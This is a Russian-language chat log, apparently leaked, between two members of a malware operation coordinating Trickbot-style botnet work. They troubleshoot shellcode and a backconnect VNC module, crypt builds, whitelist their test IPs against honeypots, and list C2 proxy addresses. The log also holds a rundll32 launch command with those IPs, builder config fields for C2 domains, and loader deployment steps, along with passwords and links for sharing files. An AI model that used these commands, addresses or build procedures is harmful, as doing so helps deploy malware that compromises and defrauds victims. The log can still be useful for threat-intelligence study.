[09.11.21 10:38:35] angelo:		я сейчас пока ещё раз шелл запущу и оставлю ботом трика поработать
[09.11.21 12:12:16] angelo:		окай
[09.11.21 12:12:17] angelo:		спс
[09.11.21 12:13:56] angelo:		и выдает ?
[09.11.21 12:13:56] angelo:		а кто обычно его криптует то ?
[09.11.21 14:36:34] angelo:		так
[09.11.21 14:36:42] angelo:		там адам путаницу устроил
[09.11.21 14:36:55] angelo:		19 можно тоже шел ?
[09.11.21 14:36:59] angelo:		да ведь ты говорил
[09.11.21 14:39:08] angelo:		ну да, всё так
[09.11.21 14:39:09] angelo:		спс
[09.11.21 15:30:00] angelo:		935b893d8c7c39b36942104429b23b3c
[09.11.21 15:30:03] angelo:		почему фейл ?
[09.11.21 15:32:19] angelo:		блин а кто на 11 запустил то
[09.11.21 15:32:23] angelo:		не обратил вниание
[09.11.21 15:33:18] angelo:		я это понял, прост оен понял кто запускал
[09.11.21 15:33:24] angelo:		я )
[09.11.21 15:33:29] angelo:		черт
[09.11.21 15:34:24] angelo:		говно
[09.11.21 15:34:28] angelo:		поторопился
[09.11.21 15:35:09] angelo:		писать Дереку ?(
[09.11.21 15:53:40] angelo:		дай совета
[09.11.21 15:56:25] angelo:		ну хоть как обьянсить
[09.11.21 15:56:29] angelo:		тупо перепутал бота ?
[09.11.21 15:56:33] angelo:		чет прям ппц тупо
[09.11.21 15:56:43] angelo:		но самому лучше написать ?
[09.11.21 16:00:48] angelo:		нам нужно учиться подтирать за собой )
[22.11.21 10:41:51] angelo:		привет !
[22.11.21 10:42:57] collin:		привет!
[22.11.21 10:43:40] angelo:		сек
[22.11.21 10:43:59] angelo:		на 57 сборке не драбтает Шелкод
[22.11.21 10:44:10] angelo:		написал чел кто хотел перенести бк в кобу
[22.11.21 10:44:36] angelo:		сборка для какого то Джека(не в курсе кто он)
[22.11.21 10:44:45] angelo:		а писал в жабе Чери
[22.11.21 10:45:19] angelo:		ах ты ж
[22.11.21 10:45:28] angelo:		а как ответить корректно ?
[22.11.21 10:45:36] angelo:		он спросил будет ШК работать и когда
[22.11.21 10:46:08] angelo:		спросил
[22.11.21 10:46:46] angelo:		могу дать
[22.11.21 10:46:50] angelo:		он мне перекидывал его
[22.11.21 10:47:07] angelo:		он уверяет что раньше работало
[22.11.21 10:47:14] angelo:		минутку
[22.11.21 10:50:10] angelo:		KHGd73idd209u2hd7lxiVJSjd2d7@*2yhdi8d2
[22.11.21 10:51:13] angelo:		не спеши
[22.11.21 10:51:31] angelo:		https://send.exploit.in/download/0370cf8cfe32370f/#yJLMYvIgm6X5SLLDzlMeSw
[22.11.21 10:51:41] angelo:		ШК
[22.11.21 10:51:45] angelo:		в блокноте
[22.11.21 10:59:40] angelo:		сказал что ни в одном боте не работал ШК
[22.11.21 11:03:52] angelo:		так, как понимаю на этих ботах уже ничего не сделать
[22.11.21 11:03:54] angelo:		логично
[22.11.21 11:04:00] angelo:		только в новых сборках ?
[22.11.21 11:04:19] angelo:		я просто уточнил на всякий
[22.11.21 11:06:02] angelo:		[03:05:12] <cherry> а чего нельзя обновить 
[03:05:17] <cherry> просто длл всем ботам? 
[03:05:23] <cherry> которые есть уже?
[22.11.21 11:06:10] angelo:		как лучше ответить ?
[22.11.21 11:07:34] angelo:		ок спасибо
[23.11.21 11:58:30] collin:		привет!
[23.11.21 11:59:07] angelo:		привет !
[23.11.21 11:59:58] angelo:		хм
[23.11.21 12:00:00] angelo:		платный ?
[23.11.21 12:35:17] angelo:		ща
[23.11.21 12:35:23] angelo:		момент
[23.11.21 12:37:55] angelo:		давай
[23.11.21 12:41:15] angelo:		проверяй
[23.11.21 12:44:26] angelo:		О сработало !
[23.11.21 12:44:32] angelo:		спасибо большое !!
[29.11.21 08:59:53] angelo:		привет !
[29.11.21 09:00:32] collin:		Привет!
[29.11.21 09:00:50] angelo:		Грем кинул сборку ВНЦ
[29.11.21 09:00:52] angelo:		надо проверить
[29.11.21 09:01:21] angelo:		мне б на тест бота
[29.11.21 09:01:40] collin:		внц боевую новую или тестовую?
[29.11.21 09:01:42] collin:		мне не скидывал
[29.11.21 09:01:56] angelo:		ночью в пятницу скидывал
[29.11.21 09:02:00] angelo:		кинуть ?
[29.11.21 09:02:27] collin:		давай
[29.11.21 09:02:35] angelo:		мы не смогли запустить версию внц что была на панели, ни работал ну никак
[29.11.21 09:03:45] angelo:		https://privnote.com/acYDLgWu#HHBpdvLVk
[29.11.21 09:04:09] angelo:		https://file.io/S1IoM8Y5r3Ok
[29.11.21 09:04:53] angelo:		там 2 основных изменения:
передача портов со списком прокладок
и запуск через regsvr32 с параметрами
Еще убрал проверку на получение ip первого сетевого интерфейса, возможно в ней дело, а так сигнатуры маленько изменились, может будет жить продолжительное время
[29.11.21 09:08:21] collin:		а проклы актуальные для внц моста есть?
[29.11.21 09:08:47] collin:		сборку закажу
[29.11.21 09:10:04] angelo:		секунду
[29.11.21 09:10:56] angelo:		45.58.53.100
65.108.52.202
185.45.192.196
80.71.158.23
192.144.39.199
198.252.108.108
45.42.201.169
172.83.155.186
45.42.201.179
[29.11.21 09:11:28] collin:		сборку БК жди от Рояла, будет для запуска и крипта в exe
[29.11.21 09:11:53] collin:		у этих проклов всех стандартный порт, переназначать не надо на какихто?
[29.11.21 09:12:27] angelo:		стандартно 9090
[29.11.21 09:13:02] angelo:		адам сел на БК ?
[29.11.21 09:13:30] angelo:		я думал он у нас админ админов
[29.11.21 09:15:54] collin:		как понять сел?
[29.11.21 09:16:32] collin:		он что-то периодически делает с ботами по запросам партнеров, что именно не говорил
[29.11.21 09:16:46] angelo:		а понял, я думал с бк стал плотно работать
[29.11.21 09:17:06] angelo:		как партнер
[29.11.21 09:27:05] collin:		`и запуск через regsvr32 с параметрами` как он написал - на БК так будет затруднительно сделать, через дроп+запуск команды bat только..
[29.11.21 09:30:12] angelo:		тут я не силен, поэтому тольо принял внц, и то был уже час ночи
[29.11.21 10:08:25] angelo:		скажи а сейчас то модуль запускать можно ?
[29.11.21 10:08:31] angelo:		этот чт оя кинул
[29.11.21 10:09:44] collin:		на боевыхъ?
[29.11.21 10:09:56] collin:		сначала проверить на тестовой лучше, если не проверялась
[29.11.21 10:10:06] collin:		по старому запуск только через rundll32
[29.11.21 10:10:24] angelo:		понял, то есть команда такая же
[29.11.21 10:12:08] collin:		а какие проблемы с ним были, то что старая версия не запускалась
[29.11.21 10:12:11] collin:		или еще что?
[29.11.21 10:12:21] angelo:		старая никак не пускалсь
[29.11.21 10:12:24] angelo:		вообще не понятно почему
[29.11.21 10:12:30] angelo:		мы с Ваилдом е мучали
[29.11.21 10:12:47] collin:		не отстукивала или прямо на ботах писал что ошибка/феил?
[29.11.21 10:12:58] angelo:		нее, именно что не запускался внц
[29.11.21 10:13:09] angelo:		команда отрабатывала
[29.11.21 10:29:38] angelo:		а почему в статусе newbie бот пишет что офлайн ?
[29.11.21 10:30:21] collin:		где это как?
[29.11.21 10:30:50] angelo:		185.176.222.56
[29.11.21 10:30:52] angelo:		в тестовых
[29.11.21 10:31:18] collin:		это ты запустил?
[29.11.21 10:31:23] collin:		из сборки Рояла?
[29.11.21 10:31:24] angelo:		да
[29.11.21 10:31:27] angelo:		да
[29.11.21 10:31:33] collin:		айдишник неправилный, что-то не то
[29.11.21 10:31:42] angelo:		ща отишу ему
[29.11.21 10:32:08] collin:		с такими айдишниками в ханики сразу же должно валиться
[29.11.21 10:32:24] angelo:		да
[29.11.21 10:32:27] angelo:		я его кинул в тестовые
[29.11.21 10:32:52] collin:		может это не твой?
[29.11.21 10:33:01] angelo:		мой
[29.11.21 10:33:03] angelo:		ип то мой
[29.11.21 10:33:06] angelo:		других нет
[29.11.21 10:36:21] collin:		судя по логу бот не стучал, тлько лоадер
[29.11.21 10:36:22] collin:		странно
[29.11.21 10:37:44] angelo:		с логами запущу
[29.11.21 10:37:57] collin:		ты мне давал айпишник свой для белых списков?
[29.11.21 10:38:08] angelo:		нет
[29.11.21 10:38:11] angelo:		новый
[29.11.21 10:38:11] angelo:		ж
[29.11.21 10:38:21] angelo:		185.176.222.56
[29.11.21 10:38:24] collin:		все правильно тогда, лоадер сел в ханипоты
[29.11.21 10:39:09] collin:		добавил айпишник, пробуй снова
[29.11.21 10:39:18] angelo:		ок
[29.11.21 11:07:52] angelo:		для ясности Рантип стави РАндолл32 и команда прежняя с новыми ипами DllRegisterServer --id %id% --group %group% --ip 45.58.53.100,65.108.52.202,185.45.192.196,80.71.158.23,192.144.39.199,198.252.108.108,45.42.201.169,172.83.155.186,45.42.201.179
[29.11.21 11:09:13] collin:		да так
[29.11.21 11:09:36] collin:		отстучал внц?
[29.11.21 11:09:48] angelo:		секунду
[29.11.21 11:10:26] angelo:		да
[29.11.21 11:13:25] angelo:		крипт проверим и адаму давать как я понял
[29.11.21 11:19:11] collin:		крипт внц?
[29.11.21 11:19:50] angelo:		я исходник проверял
[29.11.21 11:19:59] angelo:		5 минут
[29.11.21 11:20:05] angelo:		проверимк прит
[29.11.21 11:20:30] angelo:		не понимаю почему тот исходник внц перестал работать в пятницу, предпосылок не было
[29.11.21 11:34:09] angelo:		а для крипта ВНЦ bk и РАндл32 равнозначны?
[29.11.21 11:35:46] collin:		и то и то должно работать
[29.11.21 12:26:52] angelo:		слид по трику он
[29.11.21 12:26:58] angelo:		тимлид
[30.11.21 13:57:43] angelo:		привет !
[30.11.21 14:00:10] collin:		привет!
[03.12.21 14:17:04] angelo:		привет
[03.12.21 14:17:30] collin:		привет!
[03.12.21 14:17:46] angelo:		Дерек дал на проверку
[03.12.21 14:17:48] angelo:		11 группу
[03.12.21 14:17:57] angelo:		тишина что-то
[03.12.21 14:18:06] angelo:		мб долго стучит ?
[03.12.21 14:18:38] collin:		минут 10-15
[03.12.21 14:19:04] collin:		может айпи новый, не в белом списке?
[03.12.21 14:19:18] angelo:		но он же должен стукнуть все равно как в тот раз
[03.12.21 14:19:20] angelo:		без Айди
[03.12.21 14:19:26] angelo:		185.176.220.233
[03.12.21 14:19:29] angelo:		разьве нет ?
[03.12.21 14:20:50] collin:		он стучал 20 минут назад
[03.12.21 14:21:23] collin:		адрес в блеклисте был, добавил
[03.12.21 14:21:30] angelo:		что за
[03.12.21 14:21:37] angelo:		я вроде запустил 10 минут как
[03.12.21 14:22:54] collin:		4 минуты назад стучал последний раз
[03.12.21 14:23:03] angelo:		окай
[03.12.21 14:23:06] angelo:		спасибо !
[03.12.21 14:23:08] collin:		почему-то в стате в ханипотах не отражено
[03.12.21 14:23:21] angelo:		ну вот в те разы из блек листа стучал
[03.12.21 14:24:48] collin:		что-то на серверной части намудрили вебщики видимо
[03.12.21 14:25:05] collin:		стучал и 7 и 10 минут назад, отстуки есть в общем журнале
[03.12.21 14:25:38] angelo:		главное стучит, склейку проверяли
[06.12.21 14:11:58] angelo:		привет
[06.12.21 14:17:51] collin:		привет!
[06.12.21 14:18:06] angelo:		запустил две склейки
[06.12.21 14:18:12] angelo:		мне кажетсья они улетели в блек
[06.12.21 14:18:19] angelo:		по 83.136.182.35
[06.12.21 14:23:29] collin:		не стучали, добавил в вайтлист
[06.12.21 14:23:36] collin:		там на сборках основные адреса на абузе, стучит долго
[06.12.21 14:23:48] collin:		проверяли сейчас - 45 минут до отстука
[06.12.21 14:23:58] angelo:		45 0_0
[06.12.21 14:24:01] angelo:		а так можно ?
[06.12.21 14:24:06] angelo:		долго ж
[06.12.21 14:25:55] collin:		дерек сказал годится
[06.12.21 14:26:16] angelo:		смотря на них, мне кажеться у них всё годиться)
[08.12.21 09:13:33] collin:		Привет!
[27.12.21 07:44:59] collin:		привет!
[27.12.21 07:45:59] angelo:		Привет !
[27.12.21 07:46:20] collin:		насчет анубиса, ты патчишь модуль init через "билдер"?
[27.12.21 07:46:29] collin:		вот это:
[27.12.21 07:46:31] collin:		```
Для создание билдов (init файл бота)
1) перейти в папку с билдером \builder\
2) отредактировать файл \builder\config.bat

PRJ_NAME - имя проекта как в админке
UPDATE_VER - версия апдейта
URL_PATH - путь куда будет стучать 
HOST_LIST - список доменов куда будет стучать

ZIP_PASS - не обязательный параметр, задающий пароль для создаваемого архива
```
[27.12.21 07:46:54] angelo:		модуль нет, онли бота
[27.12.21 07:47:04] collin:		а вот это кто делает?
[27.12.21 07:47:13] angelo:		хм
[27.12.21 07:47:27] angelo:		сек узнаю
[27.12.21 07:47:46] angelo:		погоди
[27.12.21 07:47:54] angelo:		я )
[27.12.21 07:48:16] collin:		то есть модули тебе собранные направить?
[27.12.21 07:48:17] collin:		бинарники
[27.12.21 07:48:27] collin:		loader и init которые
[27.12.21 07:48:34] collin:		я собрал по просьбе Бездаря
[27.12.21 07:48:39] angelo:		мне да
[27.12.21 07:48:41] collin:		из тех исходников, которые мне кодер их передал
[27.12.21 07:49:21] angelo:		прости бро, ночь безсонная была, пока сообаржаю как будильник
[27.12.21 07:49:48] angelo:		ты сделал бота и лоадер ?
[27.12.21 07:50:03] angelo:		сейчас нужно обновить  через админку анубиса
[27.12.21 07:50:11] collin:		loader и init только
[27.12.21 07:50:14] collin:		ботпака у меня нет исходников
[27.12.21 07:57:48] collin:		```
h4nsK(Le4ns#Jrnsk5V8JEh
https://privatlab.com/s/v/8RarLp8jMYFmGnOr9VGe
https://privatlab.com/s/d/8RarLp8jMYFmGnOr9VGe/ZOYQg#delete
```
[27.12.21 07:58:15] collin:		держи бинарники, попробуй их подготовить
[27.12.21 08:02:21] angelo:		давай уточним побыстрому
[27.12.21 08:02:32] angelo:		ты собрали лоадер ?
[27.12.21 08:02:35] angelo:		и бота самого ?
[27.12.21 08:02:43] collin:		модули loader и init
[27.12.21 08:03:00] collin:		без ботпака
[27.12.21 08:03:44] angelo:		ппотерпи меня малец
[27.12.21 08:03:56] angelo:		а что такое инит ?
[27.12.21 08:04:18] angelo:		лоадер создается из второй админки(админка лоадера)
[27.12.21 08:04:54] angelo:		пиздец я тугой сейчас
[27.12.21 08:04:55] collin:		у меня исходники для двух модулей лоадер и инит
[27.12.21 08:04:58] collin:		патчится именно инит
[27.12.21 08:05:06] collin:		ты наверное больше про этот бот знаешь чем я)
[27.12.21 08:05:14] collin:		могу скинуть весь пакет исходники+доки, то что мне дали
[27.12.21 08:05:30] angelo:		ща посомтрю файлы
[27.12.21 08:09:23] angelo:		так, два йафла мне знакомы
[27.12.21 08:09:29] angelo:		они лежал в билдере для билда бота
[27.12.21 08:09:39] angelo:		lib я не понял накой и откуда они
[27.12.21 08:09:59] collin:		я тоже не в курсе, он собрался в комплекте
[27.12.21 08:10:11] angelo:		)) ща разберемся
[27.12.21 08:10:46] collin:		про либ в доках нет у меня..
[27.12.21 08:17:37] angelo:		да, мы чет все не понимаем для чего эта сборка нужна была
[27.12.21 08:17:44] angelo:		выясню у Бездаря
[27.12.21 08:18:34] collin:		`[24.12.2021 12:14:30] <bezdar> ну хотябы из того что есть сделать ребилд лоадера `
[27.12.21 08:18:51] collin:		ну вот он писал, я сказал что у меня есть - попросил сделать то что есть..
[27.12.21 08:20:12] angelo:		угу, чутка ясности прибавилось
[27.12.21 08:20:17] angelo:		вопрос был именно по лоадеру
[27.12.21 08:23:10] angelo:		а при билде былли какие то водные данные ?
[27.12.21 08:23:20] angelo:		домены/впс
[27.12.21 08:23:56] collin:		у меня нет
[27.12.21 08:24:05] collin:		их надо указать при патче модуля init видимо
[27.12.21 08:24:29] angelo:		да вот весь вопрос в том что билдиться из админки
[27.12.21 08:24:32] angelo:		выясняем
[27.12.21 08:36:33] angelo:		скинь плиз инструкцию
[27.12.21 08:36:54] collin:		инструкцию про что?
[27.12.21 08:37:05] angelo:		что тебе скидывали
[27.12.21 08:37:07] angelo:		что есть
[27.12.21 08:37:21] angelo:		надо понять куда исходникик кидать по лоадеру
[27.12.21 08:39:35] collin:		```
U94n%Baj4ne8k$Ndj8ke
https://privatlab.com/s/v/ero5zakZG4h78dDbeE8L
https://privatlab.com/s/d/ero5zakZG4h78dDbeE8L/jL0az#delete
```
[27.12.21 08:42:32] angelo:		вот ответ
[27.12.21 08:42:34] angelo:		2) взять файлы 
\bin\RELEASE\loader_dll_64.dll
\bin\RELEASE\loader_exe_64.exe
3) скопировать (заменить существующие) их на сервер в папку
/mnt/work/loader_v2/storage/loader/
4) после этого лоадер уже можно билдить в его админке
[14.02.22 15:01:43] angelo:		привет !
[14.02.22 15:01:47] angelo:		нужен на минутку
[14.02.22 15:05:37] angelo:		тут ?
[14.02.22 15:33:39] collin:		привет!
[14.02.22 15:36:15] angelo:		го отр
[14.02.22 15:36:22] angelo:		или в группе посмотри мой вопрос
[14.02.22 15:37:13] collin:		включай
[14.02.22 15:37:27] angelo:		короче
[14.02.22 15:37:28] collin:		какой адрес
[14.02.22 15:37:42] angelo:		195.123.240.41
[14.02.22 15:38:09] collin:		для тестов?
[14.02.22 15:38:19] angelo:		ага
[14.02.22 15:38:20] angelo:		мой
[14.02.22 15:38:23] collin:		добавил
[14.02.22 15:38:28] angelo:		спс
[14.02.22 16:29:34] angelo:		а судос чей ?
[21.02.22 15:32:27] angelo:		hi
[21.02.22 15:32:40] angelo:		otr
